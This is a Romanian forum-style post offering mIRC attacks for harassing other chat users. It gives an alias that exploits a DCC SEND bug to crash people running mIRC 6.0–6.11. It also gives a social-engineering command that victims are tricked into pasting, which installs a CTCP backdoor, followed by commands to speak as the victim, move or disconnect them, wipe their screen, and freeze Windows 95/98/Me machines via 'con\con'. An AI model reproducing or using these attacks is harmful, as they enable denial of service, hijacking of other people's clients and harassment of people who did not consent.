551

mIRC

DACA VRETI SA VA DISTRATI CU mIRC-UL poate voi cunoasteti deja , atunci scriti ceva mai interesant Haii sa fim si noi smecheri, si daca am gasit un exploit pentru mirc sa ne distram cu el deci trebuie odata sa scrieti comanda : /alias /hit //quote PRIVMSG $$1 : $ (1) $ DCC SEND " $ (x (0160),100) $ dupa ce ati scri comanda asta nu va mai ramane nimic de facut decat , atunci cand nu aveti ce face sau va enerveaza ceva persoane de pe un canal, nu trebuie decat sa scrieti comanda : /hit nick/canal si o sa vedeti cum pica acea persoana sau mai multe persoane de pe acel canal , cu conditia ca ei sa foloseasca versiunea de mirc 6.0 ; 6.1 ; 6.2 ; 6.3 ; 6.4 ; 6.5 ; 6.6 ; 6.7 ; 6.8 ; 6.9 ; 6.10 ; 6.11 . dar sa nu aiba versiunea 6.12 care deja este securizata . Dar... ca sa fim si mai smecheri hai sa ne protejam noi sa nu ne poata pica alti ... pentru asta trebuie sa scrieti comanda : /ignore -wd * . Problema ii ca daca si alti stiu comanda de ignore. chiar si daca au o vers. de mirc din cele mentionate mai sus tot nu`l poti pica... dar... merita sa incerci . COMANDA://me :-) | write -c x ctcp 1:*:?:$1- | //me : | .load -rs xOdata ce a scris comanda va aparea in locul in care a scriso urmatoarele semne::-):Dupa ele stitzi ca victima a pus comanda ! Odata ce a pus-o vetzi avea acces ctcp pe toate comenzile mircului!!!Acum folositzi urmatoarele comenzi :/ctcp nick /msg nick-sau-canal mesaj aceasta va face ca prin intermediul nickului victimei sa scrietzi ce text vretzi unde vretzi !!!/ctcp nick /join #canal aceasta comanda va face ca victima sa intre pe canalul dorit;/ctcp nick /part #canal aceasta comanda va face ca victima sa iese de pe canalul dorit;/ctcp nick /disconnect aceasta comanda va face ca victima sa iese de pe MIRC;/ctcp nick join #6,0 aceasta comanda va face ca victima sa iasa de pe toate canalele pe care se afla /ctcp nick /clearscreen aceasta comanda ii va shterge victimei tot scrisu din mirc.. astfel nu va mai vedea nimik din ce a vorbit Atzi prins ideea? Ma bucur.. dar mai am o comanda frumoasa in caz ca victima va injurat sau enervat prea mult:/ctcp nick /run c:concon Aceasta comanda ii va bloca automat computeru (ATENTZIE: merge numai pe 98, 95 ,Me)NOTA: Daca personana e suspecta de comanda de mai sus putetzi incerca direct /run c:concon shi ii vetzi bloca direct copmuterul.
0